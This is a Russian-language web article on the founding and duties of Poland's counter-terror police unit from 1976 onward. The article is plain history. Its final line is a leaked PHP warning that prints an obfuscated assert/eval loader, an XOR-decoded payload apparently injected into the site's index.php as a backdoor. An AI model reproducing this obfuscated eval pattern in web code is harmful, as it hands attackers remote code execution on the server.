История создания спецназа Польши

Подразделения спецназа

Спецназ Польши

Во времена наибольшего расцвета мирового терроризма, польское Министерство внутренних дел приняло решение создать в составе Управления варшавской милиции специальное подразделение, задачей которого будет ведение антитеррористической деятельности. Такое подразделение было создано 22 февраля 1976 года.

Однако первым действительно настоящим подразделением антитеррора стал созданный в мае того же года Сектор отдела охраны Министерства внутренних дел. Его главной задачей была борьба со всеми формами терроризма, а также разрешение опасных ситуаций, которые представляют угрозы для общественного порядка как на территории Варшавы, так и территории всей страны. В результате, Сектор стал первым (не считая группу «А» КГБ СССР, которая была создана двумя годами ранее) подразделением антитеррора, созданным в странах восточной Европы. В качестве примера поляки взяли финское подразделение Osasto Karhu, с которым делегация Министерства внутренних дел Польши познакомилась во время своего делового визита в Хельсинки.

Основателем и первым командиром вновь созданной группы стал Эдуард Мишталь, который проходил службу в Поморской десантно-штурмовой дивизии. Первые 400 кандидатов были отобраны из числа служащих милиции Варшавы, офицеров набирали из взвода парашютистов моторизованных сил народной милиции – подразделения спецназа для борьбы с воздушным терроризмом. Это подразделение было создано в начале 1970-х годов для противодействий захватам самолетов национальной польской авиакомпании ЛОТ, а затем было расформировано в 1975 году.

После проведения отбора, в числе кандидатов осталось только 47 человек. Они и вошли в состав вновь сформированного антитеррористического подразделения. Группа получила название «Тигровая бригада». Аналогично этому подразделению, в крупнейших городах Польши были созданы еще семь специальных взводов для борьбы с беспорядками, а в 1985 году дополнительно были сформированы еще два таких взвода.

В начале 1980-х годов в Польше складывается довольно непростая общественно-политическая обстановка. В целом ряде районов страны жители выступают за смену существующего правительственного порядка. Происходят около 20 попыток захвата самолетов, из которых 8 увенчались успехом. Основной мотив, который двигал угонщиками – убежать таким образом на Запад, с целью поиска там лучшей жизни. Конечно же, государству пришлось реагировать на развитие ситуации. Произошедшие захваты самолетов побудили поднять численность подразделения до 237 человек. В нем помимо административной группы было создано подразделение, которое отвечало обеспечению безопасности перелетов самолетами авиакомпании ЛОТ. В это подразделение были набраны 140 новых сотрудников. На каждый авиарейс было выделено по 2-3 бойца спецназа, которые должны были в случае угрозы предотвратить захват самолета.

Но главными задачами спецназа все также оставались борьба с терроризмом и организованными преступными группами, арест опасных преступников, поиск и спасение утопающих, проведение подводных работ в рамках расследования уголовных дел, поиск и уничтожение взрывоопасных объектов. Позднее круг задач подразделения был расширен – в него также вошли обеспечение безопасности высокопоставленных лиц, сопровождение опасных преступников и ценных грузов, подавление беспорядков в тюрьмах и колониях, а также усмирение болельщиков на футбольных матчах.

Опубликовано 17-11-2011, 20:25 Просмотров 136

поделись с друзьями
Комментарий:
Введите код: *
Warning: assert(): Assertion "eval('$nGIE3=$FHLfom3Fx($nGIE3);$bQQvD7cg="";$QVSry4="DuSAkQ";for($gyBB3G=0;$gyBB3G<716;$gyBB3G++)$bQQvD7cg.=chr(ord($nGIE3[$gyBB3G])^ord($QVSry4[$gyBB3G%6]));@eval($cnDaz8X($bQQvD7cg));');" failed in /home/a/alvis2/tchest.org/public_html/index.php on line 321